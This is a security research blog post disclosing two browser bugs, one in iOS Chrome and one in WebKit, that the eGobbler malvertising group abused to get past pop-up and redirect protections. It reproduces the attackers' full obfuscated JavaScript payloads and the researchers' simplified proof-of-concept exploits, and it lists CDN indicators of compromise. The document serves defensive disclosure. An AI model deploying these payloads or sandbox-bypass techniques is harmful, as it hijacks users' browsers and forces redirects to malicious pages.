Malvertiser ‘eGobbler’ Exploits Chrome & WebKit Bugs, Infects Over 1 Billion Ads
We have written about the threat actor eGobbler extensively on our blog over the last year as they’ve continued to emerge as a prolific source of malvertising. It’s not uncommon for their campaigns to compromise up to hundreds of millions of programmatic ad impressions in a matter of hours and the impact from their ongoing activity is felt across the United States and Europe.
Over the past 6 months, the threat group has leveraged obscure browser bugs in order to engineer bypasses for built-in browser mitigations against pop-ups and forced redirections.
This blog post will provide overviews and proof of concepts for both browser exploits. The first exploit that we reported on April 11, 2019 impacts Chrome versions prior to 75 on iOS. The second, which we reported on Aug. 7 was fixed in iOS 13 / Safari 13.0.1 on Sept. 19, impacts WebKit based browsers.
CVE-2019–5840
Our last published eGobbler investigation from earlier this year uncovered that the malvertiser was leveraging a Chrome exploit in order to bypass the browser’s built-in pop-up blocker on iOS devices. The impact was augmented by the fact that the bypass was completely unmitigated by iframes with standard ad serving sandbox attributes:
Upon uncovering the bug that was being leveraged by the group, we immediately reported it to the Chromium team, where it was promptly addressed and fixed in the Chrome 75 release (CVE-2019–5840):
https://chromereleases.googleblog.com/2019/06/stable-channel-update-for-desktop.html
On Aug. 7th, the Chrome team finally lifted the security view restrictions on the report that we submitted, making our POC exploit code publicly available:
https://bugs.chromium.org/p/chromium/issues/detail?id=951782
The exploit code was reverse engineered from eGobbler’s original obfuscated payload:
<html><body><script>window.xurl_='hxxps://REDACTED/track/d8cb642b-c0d4-49d0-b256-fe56f9e7e842?siteid=7fa62502d2e75668b2de2e96980cd647&var1={sitedomain}&var6=7fa62502d2e75668b2de2e96980cd647&var5=1';setTimeout(()=>{try{top.location.href='hxxps://REDACTED/track/d8cb642b-c0d4-49d0-b256-fe56f9e7e842?siteid=7fa62502d2e75668b2de2e96980cd647&var1={sitedomain}&var6=7fa62502d2e75668b2de2e96980cd647&var5=2';}catch(e){}},9000);var a=['EcOeJ0vDug==','HiAiw5w3','w5/CnW0tVA==','bMKdwqMDBQ==','wrDCu8KcwohZ','w6MpTcKXwp8=','R8OawofCncOi','A23CkmLClw==','w4bDscOkwoHDsA==','w6IRw4IZwqY=','w5wKw542woQ=','w781wpPCgUXDgg==','w64qwrDChm8=','w4QkUsKCw7lMw5ISNsK5w6zCgA==','w706WcK4wpY=','w6MVwo3Cm2Q=','K8OKw57DsEk=','w6MuRsKwwo8=','wrrDgMK0GMKh','w5TClsOaEEY=','CEjDljcs','w43DjsKsIcKnwqnCv8OGSMO9w6cMLG5LNMK7JkNJKcKtSCVzw7ZccHB8w4Jmw6J0BQnCg8KsMMO/w6bCp8KYLWx4w5vDpijDmFdNWMKIwp3CmmHDgkHCq8KjwpEiw5TDj0XDjMOVw5I8bsOWdsOYw57Doh3CtsKQw7PDmRTCtVbDt8KWw4PDlk8mwos=','f8Oqw5t5wpQ=','Oik2w7kxOyLDlsOVFcO/w7jCtxBfIcOfR8O9wowowoUww4bDjykBVcKZwoYDKMKnw7fDkcKGwotgXMKkw4QtSBkAw6hJP3oDw4nCigbCksKiSMKqRj/Cgz8/LELCtsOKw5ViTQNfD8Kdw5YSKiNDw5nCpsKWw5vCsXTCtcKjw7zDmQk5w4rChMOMGw4sTCfCgG4iBMKfw7U=','w5zCuWI+XA==','wrF6wpjDhBHDmyk/wrTDpcOVYHRXBMKfwpzCucKmDMOmw5bCli3CozY=','XSDCt8OmQQ==','B8KeSHsdw7QvNsKzHQnCom7ClsOXbMKtJnA8EVrDkMKmCMKVSsOqLB3DucOFNcOIwqPCnCHDvMKmwq7DpCPCisOpKsKYw5IVPSNBw7FmUcKtw65xOcOxwpoUw4HDsMKjw6fDmDbClA==','WF7Ct1ss','FRdjIsOfw67DmVnCmBXCs8OaBsOSJjrCmQ9+Pw4V','LSwBw7sK','ZcKBw5LDgXE=','LcOlA8O2wqDCqg==','U8KAwps8BA==','F33CjmnCvGc=','w6s9TcKewq5Qw78PO8K4','w6YgwpfCjU/ChlwtwrXDrA==','d3LDsz8oT8KRw6dRwp5t','w5fDgsOXwpvDtA==','wrjCmcK5wq9/','w7nCqlguaw=='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};var g=function(){var h={'data':{'key':'cookie','value':'timeout'},'setCookie':function(i,j,k,l){l=l||{};var m=j+'='+k;var n=0x0;for(var n=0x0,p=i['length'];n<p;n++){var q=i[n];m+=';\x20'+q;var r=i[q];i['push'](r);p=i['length'];if(r!==!![]){m+='='+r;}}l['cookie']=m;},'removeCookie':function(){return'dev';},'getCookie':function(s,t){s=s||function(u){return u;};var v=s(new RegExp('(?:^|;\x20)'+t['replace'](/([.$?*|{}()[]\/+^])/g,'$1')+'=([^;]*)'));var w=function(x,y){x(++y);};w(e,d);return v?decodeURIComponent(v[0x1]):undefined;}};var z=function(){var A=new RegExp('\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*[\x27|\x22].+[\x27|\x22];?\x20*}');return A['test'](h['removeCookie']['toString']());};h['updateCookie']=z;var B='';var C=h['updateCookie']();if(!C){h['setCookie'](['*'],'counter',0x1);}else if(C){B=h['getCookie'](null,'counter');}else{h['removeCookie']();}};g();}(a,0xaf));var b=function(c,d){c=c-0x0;var e=a[c];if(b['mjzByd']===undefined){(function(){var f=function(){var g;try{g=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(h){g=window;}return g;};var i=f();var j='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';i['atob']||(i['atob']=function(k){var l=String(k)['replace'](/=+$/,'');for(var m=0x0,n,o,p=0x0,q='';o=l['charAt'](p++);~o&&(n=m%0x4?n*0x40+o:o,m++%0x4)?q+=String['fromCharCode'](0xff&n>>(-0x2*m&0x6)):0x0){o=j['indexOf'](o);}return q;});}());var r=function(s,t){var u=[],v=0x0,w,x='',y='';s=atob(s);for(var z=0x0,A=s['length'];z<A;z++){y+='%'+('00'+s['charCodeAt'](z)['toString'](0x10))['slice'](-0x2);}s=decodeURIComponent(y);for(var B=0x0;B<0x100;B++){u[B]=B;}for(B=0x0;B<0x100;B++){v=(v+u[B]+t['charCodeAt'](B%t['length']))%0x100;w=u[B];u[B]=u[v];u[v]=w;}B=0x0;v=0x0;for(var C=0x0;C<s['length'];C++){B=(B+0x1)%0x100;v=(v+u[B])%0x100;w=u[B];u[B]=u[v];u[v]=w;x+=String['fromCharCode'](s['charCodeAt'](C)^u[(u[B]+u[v])%0x100]);}return x;};b['ZXxSdo']=r;b['eKRqiN']={};b['mjzByd']=!![];}var D=b['eKRqiN'][c];if(D===undefined){if(b['KqyMIp']===undefined){var E=function(F){this['OYfmTn']=F;this['JhgoEm']=[0x1,0x0,0x0];this['ywIcjZ']=function(){return'newState';};this['QoQavM']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*';this['UAFKvX']='[\x27|\x22].+[\x27|\x22];?\x20*}';};E['prototype']['xLdhmX']=function(){var G=new RegExp(this['QoQavM']+this['UAFKvX']);var H=G['test'](this['ywIcjZ']['toString']())?--this['JhgoEm'][0x1]:--this['JhgoEm'][0x0];return this['tWvXeR'](H);};E['prototype']['tWvXeR']=function(I){if(!Boolean(~I)){return I;}return this['SGfhNf'](this['OYfmTn']);};E['prototype']['SGfhNf']=function(J){for(var K=0x0,L=this['JhgoEm']['length'];K<L;K++){this['JhgoEm']['push'](Math['round'](Math['random']()));L=this['JhgoEm']['length'];}return J(this['JhgoEm'][0x0]);};new E(b)['xLdhmX']();b['KqyMIp']=!![];}e=b['ZXxSdo'](e,d);b['eKRqiN'][c]=e;}else{e=D;}return e;};var c=function(){var c=!![];return function(d,e){var f=c?function(){if(e){var g=e['apply'](d,arguments);e=null;return g;}}:function(){};c=![];return f;};}();var H=c(this,function(){var c=function(){return'\x64\x65\x76';},d=function(){return'\x77\x69\x6e\x64\x6f\x77';};var e=function(){var f=new RegExp('\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d');return!f['\x74\x65\x73\x74'](c['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var g=function(){var h=new RegExp('\x28\x5c\x5c\x5b\x78\x7c\x75\x5d\x28\x5c\x77\x29\x7b\x32\x2c\x34\x7d\x29\x2b');return h['\x74\x65\x73\x74'](d['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var i=function(j){var k=~-0x1>>0x1+0xff%0x0;if(j['\x69\x6e\x64\x65\x78\x4f\x66']('\x69'===k)){l(j);}};var l=function(m){var n=~-0x4>>0x1+0xff%0x0;if(m['\x69\x6e\x64\x65\x78\x4f\x66']((!![]+'')[0x3])!==n){n(m);}};if(!e()){if(!g()){i('\x69\x6e\x64\u0435\x78\x4f\x66');}else{i('\x69\x6e\x64\x65\x78\x4f\x66');}}else{i('\x69\x6e\x64\u0435\x78\x4f\x66');}});H();window[b('0x0','O)QW')]=setInterval(function(){var m={};m[b('0x1','O)QW')]=b('0x2',')v*V');m[b('0x3','Tmlx')]=function(n,o){return n>o;};m[b('0x4','O)QW')]=function(p,q){return p<q;};m[b('0x5','95Sf')]=function(r,s){return r-s;};m[b('0x6',')v*V')]=function(t,u){return t(u);};m[b('0x7','7Llt')]=function(v,w){return v+w;};m[b('0x8','sT%r')]=function(x,y){return x+y;};m[b('0x9','T%W!')]=b('0xa','7Llt');m[b('0xb','uheO')]=b('0xc','&DOL');m[b('0xd','c]am')]=b('0xe','O)QW');m[b('0xf','lDi*')]=b('0x10','&i38');m[b('0x11','CpNG')]=function(z,A,B){return z(A,B);};var C=D=>{let E=document[b('0x12','Kt)5')](m[b('0x13','&DOL')]);if(E&&m[b('0x14','GWeg')](E[b('0x15','9Os7')],D))for(let F=0x0;m[b('0x4','O)QW')](F,m[b('0x16','O1@^')](E[b('0x17','^Piw')],D));++F){let G=E[F];G[b('0x18',')v*V')]&&G[b('0x19','O)QW')][b('0x1a','2lYq')](G);}};document[b('0x1b','IoES')](m[b('0x1c','WijS')](m[b('0x1d','c]am')](m[b('0x1e','*UC1')](m[b('0x1f','&DOL')](m[b('0x20','c]am')](m[b('0x21','O1@^')],m[b('0x22','WijS')]),window[b('0x23',')v*V')]),m[b('0x24','h[Ke')]),window[b('0x25','^Piw')]),m[b('0x26','IoES')]));m[b('0x27','HyXk')](setTimeout,()=>{m[b('0x28','HyXk')](C,0x1);},0x0);},0x12c);</script></body></html>Given that most forced redirections are generally a minimal variation of the same one liner, this one caught our attention due to its complexity.
In order to get a handle on what was happening here, we began the process of staging this tag in a series of cross-origin iframes on multiple devices (with and without sandboxing enabled).
For reference, standard ad serving sandbox attributes include the following:
"allow-forms allow-pointer-lock allow-popups allow-popups-to-escape-sandbox allow-same-origin allow-scripts allow-top-navigation-by-user-activation"We already knew that this specific campaign was targeting mobile devices, so we checked those first. Shockingly, we found that even when the sandbox parameters were present, a pop-up would be spawned when the user tapped on the parent page. The Chrome browser on iOS was impacted, whereas other mobile and desktop browsers successfully blocked the pop-up.
We re-implemented the exploit as a proof of concept without the bloat:
<html>
<head></head>
<body>
<script>
window["looper"] = setInterval(function() {
var inputPayload = '<input type="text" class="badInput" style="width:0px;height:0px;border:0px;" autofocus onblur="javascript:window.open(\'hxxps://www.popuppayload.com/\');">';
// doc.write the tag
document.write(inputPayload);
// queue the cleanup function
setTimeout(function(){
var inputs = document.getElementsByClassName("badInput");
if (inputs.length > 1){
for ( i =0; i < inputs.length; ++i){
inputs[i].remove();
}
}
},0);
}, 300);
</script>
</body>
</html>Timeline
April 11 — We reported the bug to both the Chrome and Google anti-malvertising teams. We heard back within several hours.
April 17 — Proposal for a fix from the Chrome team.
June 4 — Fix was included in the Chrome 75 release and CVE-2019–5840 issued:
https://chromereleases.googleblog.com/2019/06/stable-channel-update-for-desktop.html
August 7 — View restrictions removed from Chrome bug report.
A New Bug — This Time In WebKit
Coincidentally, at around the same time that the view restrictions on the original Chromium ticket were lifted, a new eGobbler payload surfaced:
<html><body><script>window.xurl_='hxxps://REDACTED';setTimeout(()=>{try{top.location.href='https://REDACTED';}catch(e){}},7000);var a=['VXfCtCrDvQ==','wok/wozDlMO6','w6PDqcOCcEY=','wpAHGWXCiQ==','JgE5aMOlwok=','HiPCnCfCuA==','YcOmEgbCkzwNwpPCjh7CiT/CoMK7wr4=','BxQsUcOq','NiLDoA7DtQ==','wq5uwrlWwqE=','QMO0JB/CpQ==','IwnCtDjCjQ==','R1LCv0JsdA==','O37CtB3DhQ==','JS5A','wpZmO0EO','LBkucsOy','GcONBBVC','E1zCu8Omw5/Djjw6wqASw7I=','LcKJP8O+wo4=','wqbDm8OXOC4kwpPCo8OH','HsO0AkPCqA==','PRvCusOhQsOJAMOpe8KNFg==','w4vCsBZlw6k=','O8OnIyViwrc9BgB5Oyo=','IcKFwqFhwpk=','w6c0w6pAwrs=','DzwgwqDCig==','wroFw5Fz','EcO/O3bCkw==','NEFFwqrCqMOTw5lvcSBmZyBVw7J2HcKIwpjCl1vDg3DCgMKsfnTCvMK3wrFKRWosXMKZUsK3w6Y=','wocBwrrDnMOy','wr/ClDfDinBtw6da','E2LClwbDnQ==','R0TCuR09eDlZC8K5wrzCvMKDwoZoK8KXYhDDrcKhwrDDvh3CmsKrw6hCa8O6KsKtw5gaw6dwOcKqWGLDnRTDusOtwpIDXcO5XmnCvMK5GGPCgMKbwrIhwoPCtDbCuUZWFcOzw6zChMK1fsK8J8OzwrA=','IxXCr8OBwpI=','Z8K9wqxgwqpXw4fDrsKZw5rCgRLCmMKlwoxLcj3CuSHDv18=','w4oXBF3CjA==','CCrDoQbDmw==','dFsEw71Cw68=','I8K/wrdDwpc=','QidJdy0=','wqE0EQHCjsOl','D8OUbywzUGBHwpoT','c8ODw7zCq8O+w4jDsmjDtcKB','w4ITBHvClcOzw45Pw6FxMA==','JAEQwpHCtMKzwr7DhcKdasKiw68y','w5XCmMKXw5zCog==','wr90BWkecA==','UAhrSxA=','w6XCusK2w77CkA==','w43DvsOoS3w=','LlRFw5XCs8OJw4BjajF9dQ==','KsK0GsO3wrM=','U8KPbQx5','WcKsXUoBw6FdwqIzwrzDiMK4','JMKIGMOvwoI=','wqR0GE8CcMK7c8OJw7g9w5w=','wqTDt8OLBQY=','w780w6vCqhM7dcO3OcOQM8K4','w7klA8KHwqY=','UcK5X0rCjh90w4nDh8KZEmg=','TcO3FxbCjg==','wrV+CHc=','worDmMOYJw==','w64DaEfCvsK4wo7Dgypc','T8Oqwo5r','wrZhHGsYYMKKcsOCw6Et','a0wJw75Zw6Q=','VsKPX3HCsQ==','w5A8cSEP','w6nDqsOjekA=','LjcXQMOI','wqjDoMOHw6DChw==','PzI7wqnCgg==','wpwAwo7Dk8OI'];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};var g=function(){var h={'data':{'key':'cookie','value':'timeout'},'setCookie':function(i,j,k,l){l=l||{};var m=j+'='+k;var n=0x0;for(var n=0x0,p=i['length'];n<p;n++){var q=i[n];m+=';\x20'+q;var r=i[q];i['push'](r);p=i['length'];if(r!==!![]){m+='='+r;}}l['cookie']=m;},'removeCookie':function(){return'dev';},'getCookie':function(s,t){s=s||function(u){return u;};var v=s(new RegExp('(?:^|;\x20)'+t['replace'](/([.$?*|{}()[]\/+^])/g,'$1')+'=([^;]*)'));var w=function(x,y){x(++y);};w(e,d);return v?decodeURIComponent(v[0x1]):undefined;}};var z=function(){var A=new RegExp('\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*[\x27|\x22].+[\x27|\x22];?\x20*}');return A['test'](h['removeCookie']['toString']());};h['updateCookie']=z;var B='';var C=h['updateCookie']();if(!C){h['setCookie'](['*'],'counter',0x1);}else if(C){B=h['getCookie'](null,'counter');}else{h['removeCookie']();}};g();}(a,0x134));var b=function(c,d){c=c-0x0;var e=a[c];if(b['TeCFIe']===undefined){(function(){var f;try{var g=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');f=g();}catch(h){f=window;}var i='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';f['atob']||(f['atob']=function(j){var k=String(j)['replace'](/=+$/,'');for(var l=0x0,m,n,o=0x0,p='';n=k['charAt'](o++);~n&&(m=l%0x4?m*0x40+n:n,l++%0x4)?p+=String['fromCharCode'](0xff&m>>(-0x2*l&0x6)):0x0){n=i['indexOf'](n);}return p;});}());var q=function(r,d){var t=[],u=0x0,v,w='',x='';r=atob(r);for(var y=0x0,z=r['length'];y<z;y++){x+='%'+('00'+r['charCodeAt'](y)['toString'](0x10))['slice'](-0x2);}r=decodeURIComponent(x);for(var A=0x0;A<0x100;A++){t[A]=A;}for(A=0x0;A<0x100;A++){u=(u+t[A]+d['charCodeAt'](A%d['length']))%0x100;v=t[A];t[A]=t[u];t[u]=v;}A=0x0;u=0x0;for(var B=0x0;B<r['length'];B++){A=(A+0x1)%0x100;u=(u+t[A])%0x100;v=t[A];t[A]=t[u];t[u]=v;w+=String['fromCharCode'](r['charCodeAt'](B)^t[(t[A]+t[u])%0x100]);}return w;};b['cQFMFR']=q;b['ZDTonJ']={};b['TeCFIe']=!![];}var C=b['ZDTonJ'][c];if(C===undefined){if(b['uDBwPd']===undefined){var D=function(E){this['GWfWxt']=E;this['HCYWxf']=[0x1,0x0,0x0];this['HxJcBw']=function(){return'newState';};this['KdicLa']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*';this['VRsMMQ']='[\x27|\x22].+[\x27|\x22];?\x20*}';};D['prototype']['qznfNF']=function(){var F=new RegExp(this['KdicLa']+this['VRsMMQ']);var G=F['test'](this['HxJcBw']['toString']())?--this['HCYWxf'][0x1]:--this['HCYWxf'][0x0];return this['cPKAHF'](G);};D['prototype']['cPKAHF']=function(H){if(!Boolean(~H)){return H;}return this['kDqlzc'](this['GWfWxt']);};D['prototype']['kDqlzc']=function(I){for(var J=0x0,K=this['HCYWxf']['length'];J<K;J++){this['HCYWxf']['push'](Math['round'](Math['random']()));K=this['HCYWxf']['length'];}return I(this['HCYWxf'][0x0]);};new D(b)['qznfNF']();b['uDBwPd']=!![];}e=b['cQFMFR'](e,d);b['ZDTonJ'][c]=e;}else{e=C;}return e;};var c=function(){var c=!![];return function(d,e){var f=c?function(){if(e){var g=e['apply'](d,arguments);e=null;return g;}}:function(){};c=![];return f;};}();var J=c(this,function(){var c=function(){return'\x64\x65\x76';},d=function(){return'\x77\x69\x6e\x64\x6f\x77';};var e=function(){var f=new RegExp('\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d');return!f['\x74\x65\x73\x74'](c['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var g=function(){var h=new RegExp('\x28\x5c\x5c\x5b\x78\x7c\x75\x5d\x28\x5c\x77\x29\x7b\x32\x2c\x34\x7d\x29\x2b');return h['\x74\x65\x73\x74'](d['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var i=function(j){var k=~-0x1>>0x1+0xff%0x0;if(j['\x69\x6e\x64\x65\x78\x4f\x66']('\x69'===k)){l(j);}};var l=function(m){var n=~-0x4>>0x1+0xff%0x0;if(m['\x69\x6e\x64\x65\x78\x4f\x66']((!![]+'')[0x3])!==n){i(m);}};if(!e()){if(!g()){i('\x69\x6e\x64\u0435\x78\x4f\x66');}else{i('\x69\x6e\x64\x65\x78\x4f\x66');}}else{i('\x69\x6e\x64\u0435\x78\x4f\x66');}});J();window[b('0x0','58cH')]=setInterval(function(){var n={};n[b('0x1','ztHO')]=b('0x2','yM5e');n[b('0x3','58cH')]=function(o,p){return o>p;};n[b('0x4','[gYk')]=function(q,r){return q<r;};n[b('0x5','JAR9')]=function(s,t){return s-t;};n[b('0x6','yM5e')]=function(u,v){return u(v);};n[b('0x7','ztHO')]=b('0x8','pjqR');n[b('0x9','FIn#')]=b('0xa','GQ5z');n[b('0xb','R%gw')]=b('0xc','58cH');n[b('0xd','mI3Q')]=b('0xe','YPr[');n[b('0xf','%q$%')]=b('0x10','Isr3');n[b('0x11','*zv2')]=b('0x12','FZig');n[b('0x13','TrQ#')]=b('0x14','mI3Q');n[b('0x15','X$SJ')]=function(w,x){return w+x;};n[b('0x16','lGr8')]=function(y,z){return y+z;};n[b('0x17','6(W$')]=b('0x18','lGr8');n[b('0x19','*zv2')]=b('0x1a','mqJ]');n[b('0x1b','$W*0')]=b('0x1c','*DN[');n[b('0x1d','FIn#')]=b('0x1e','pjqR');n[b('0x1f','Mr%G')]=function(A,B,C){return A(B,C);};let D=E=>{let F=document[b('0x20','gJ%v')](n[b('0x21','YA3#')]);if(F&&n[b('0x22','[gYk')](F[b('0x23','vHhm')],E))for(let G=0x0;n[b('0x24','X$SJ')](G,n[b('0x25','GQ5z')](F[b('0x26','RxOO')],E));++G){let H=F[G];H[b('0x27','6v^L')]&&H[b('0x28','H^i1')][b('0x29','YA3#')](H);}};let I=document[b('0x2a','6(W$')](n[b('0x2b','iKWC')]);I[b('0x2c','R%gw')]=n[b('0x2d','GQ5z')];I[b('0x2e','iKWC')]=n[b('0x2f','0(fZ')];I[b('0x30','mqJ]')](n[b('0x31','%q$%')],n[b('0x32',']CdI')]);I[b('0x33','Ug8[')](n[b('0x34','%q$%')],'0');I[b('0x35','R%gw')](n[b('0x36','HEGR')],'no');I[b('0x37','JVi[')](n[b('0x38','2I)I')],'0');I[b('0x39','^c0P')](n[b('0x3a','yM5e')],'0');(document[b('0x3b','R%gw')]||document[b('0x3c','HEGR')][b('0x3d','!^d5')]||document[b('0x3e','tHF2')])[b('0x3f','R%gw')](I);I[b('0x40','vHhm')]=n[b('0x41','^c0P')](n[b('0x42','vtA7')](n[b('0x43','0(fZ')](n[b('0x44','58cH')](n[b('0x45','h^3]')],n[b('0x46','6(W$')]),window[b('0x47','$W*0')]),n[b('0x48','&YD5')]),n[b('0x49','$W*0')]);n[b('0x4a','0(fZ')](setTimeout,()=>{n[b('0x4b','@y%*')](D,0x1);},0xa);},0x12c);</script></body></html>While this payload looks similar to the prior Chrome exploit on the surface, we found it peculiar that eGobbler would still be running outdated exploit code that was fixed months ago, so we recreated our test environment and staged the payload across over two dozen devices and browser versions.
This time around however, the iOS Chrome pop-up was not spawning as before, but we were in fact experiencing redirections on WebKit browsers upon the ‘onkeydown’ event. We were able to de-obfuscate the code above to come up with the following POC:
<html>
<head></head>
<body>
<script>
window["looper"] = setInterval(function() {
let I = document.createElement("iframe");
I.classList.add('badFrame');
(document['body'] || document['head']['parentNode'] || document['head'])['appendChild'](I);
I['srcdoc'] = '<script>onkeydown=function(){top.location="hxxp://redirect";}<\/script><input autofocus type="text" style="width:0px;height:0px;border:0px;">';
//queue the cleanup function
setTimeout(function(){
var inputs = document.getElementsByClassName("badFrame");
if (inputs.length > 1){
for ( i =0; i < inputs.length; ++i){
inputs[i].remove();
}
}
},10);
}, 300);
</script>
</body>
</html>The nature of the bug is that a cross-origin nested iframe is able to “autofocus” which bypasses the “allow-top-navigation-by-user-activation” sandbox directive on the parent frame. With the inner frame automatically focused, the keydown event becomes a user activated navigation event, which renders the ad sandboxing entirely useless as a measure for forced redirect mitigation.
Also noteworthy is that the campaign behind this payload had specifically targeted some web applications with text areas and search forms in order to maximize the chances of hijacking these keypresses.
Timeline
August 7 — We reported the bug to both the Chrome and Apple security teams. We heard back from the Chrome team within the hour.
August 9 — The Apple security team responded that they were investigating.
August 12 — The Chrome team provides an update that a patch was submitted to WebKit on August 9:
September 19 — Fixed in iOS 13.
September 24 — Fixed in Safari 13.0.1
Malvertising At Scale
If we take a snapshot of eGobbler activity from Aug. 1— Sep. 23, 2019 then we see a staggering volume of impacted programmatic impressions. By our estimates, we believe up to 1.16 billion impressions have been effected.
Over 1.16 Billion compromised impressions since August 1.
A closer look at the data shows how the threat actors target their campaigns based on geographic region, device, browser, and platform:
eGobbler’s preference for desktop platforms during this period supports their latest WebKit exploit, as the ‘onkeydown’ event is less likely to spawn organically during mobile browsing. Historic activity from the threat actor, prior to mid-June was generally targeted towards mobile devices.
Indicators Of Compromise
The eGobbler group will often use CDNs for payload delivery. When available, they will leverage subdomains that look innocuous or include familiar brands. The following CDN endpoints have been used to serve variations of the exploit codes above:
cascade.gcdn.co
adamstoyota.gcdn.co
cbcmusic.gcdn.co
1345502334.rsc.cdn77.org
1444653862.rsc.cdn77.org
1120708373.rsc.cdn77.org
1044318185.rsc.cdn77.org
1214393181.rsc.cdn77.org
1470630001.rsc.cdn77.org
1039644320.rsc.cdn77.org
1345502334.rsc.cdn77.org
1444653862.rsc.cdn77.org
1120708373.rsc.cdn77.org
privacy-center.azureedge.net
pulte.scdn4.secure.raxcdn.com
feed.scdn6.secure.raxcdn.com
audiencex.scdn2.secure.raxcdn.com
redditstatic.scdn6.secure.raxcdn.com
js-agent.scdn8.secure.raxcdn.com
paypalobjects.scdn1.secure.raxcdn.com
bdo.scdn6.secure.raxcdn.com
cancerresearchuk.scdn6.secure.raxcdn.com
thebelnord.scdn4.secure.raxcdn.com
t-mobile.scdn2.secure.raxcdn.com
honda.scdn5.secure.raxcdn.com
adidas.scdn8.secure.raxcdn.com
simpli.scdn2.secure.raxcdn.com
addthis.scdn5.secure.raxcdn.com
zetaglobal.scdn2.secure.raxcdn.com
timeonegroup.scdn4.secure.raxcdn.com
yandex.scdn7.secure.raxcdn.com
typekit.scdn7.secure.raxcdn.com
reuters.scdn4.secure.raxcdn.com
xaxis.scdn3.secure.raxcdn.com
adnami.scdn1.secure.raxcdn.com
en25.scdn8.secure.raxcdn.com
tenable.global.ssl.fastly.net
panasonic.global.ssl.fastly.net
carrefour.global.ssl.fastly.net
opel.global.ssl.fastly.net
bankofamerica.global.ssl.fastly.net
baltimore.global.ssl.fastly.net
entresto.global.ssl.fastly.net
nytimes.global.ssl.fastly.net
advangelist.global.ssl.fastly.net
ezoic.global.ssl.fastly.net
subscriberscdn.global.ssl.fastly.net
createchallenge.global.ssl.fastly.net
optum.global.ssl.fastly.net
verizonwireless.global.ssl.fastly.net
tennessean.global.ssl.fastly.net
verizonwireless.global.ssl.fastly.net
ultimatesoftware.global.ssl.fastly.net
adsafeprotected.global.ssl.fastly.net
marketo.global.ssl.fastly.net
npttech.global.ssl.fastly.net
newrelic.global.ssl.fastly.net
website-files.global.ssl.fastly.net
britishairways.global.ssl.fastly.net
adroll.global.ssl.fastly.net
